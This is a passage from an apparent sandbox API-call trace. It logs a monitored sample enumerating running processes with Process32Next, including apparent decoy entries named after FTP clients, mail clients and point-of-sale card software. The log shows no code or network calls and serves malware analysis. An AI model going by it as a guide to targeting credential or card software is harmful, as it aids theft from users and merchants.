cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.529] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.531] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.533] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.535] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0175.537] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0175.539] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0175.587] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0175.590] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.593] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0175.596] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0175.602] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0175.604] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0175.607] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0175.609] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0175.612] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.614] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.617] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0175.619] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0175.624] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0175.630] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0175.633] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0175.635] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0175.637] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0175.640] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0175.643] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0175.645] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0175.702] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0175.705] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0175.707] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0175.709] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0175.711] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0175.713] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0175.716] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0175.718] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0175.730] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0175.732] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0175.734] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0175.737] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0175.739] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0175.741] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0175.743] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0175.746] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0175.749] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0175.752] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0175.756] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0175.758] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0175.761] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0175.768] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0175.771] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0175.774] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0175.778] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0175.781] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0175.785] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0175.787] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0175.790] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0175.793] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0175.795] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0175.797] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0175.800] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0175.802] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0175.804] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0175.809] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0175.811] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0175.813] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0175.815] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0175.817] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0175.819] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0175.822] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0175.823] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0175.825] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0175.827] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0175.829] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0175.831] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0175.834] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0175.836] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0175.839] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0175.842] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0175.847] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0175.849] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0175.852] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0175.854] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0175.859] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0175.862] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0175.864] Process32Next (in: hSnapshot=0x1eb8, lppe=0x102efe20 | out: 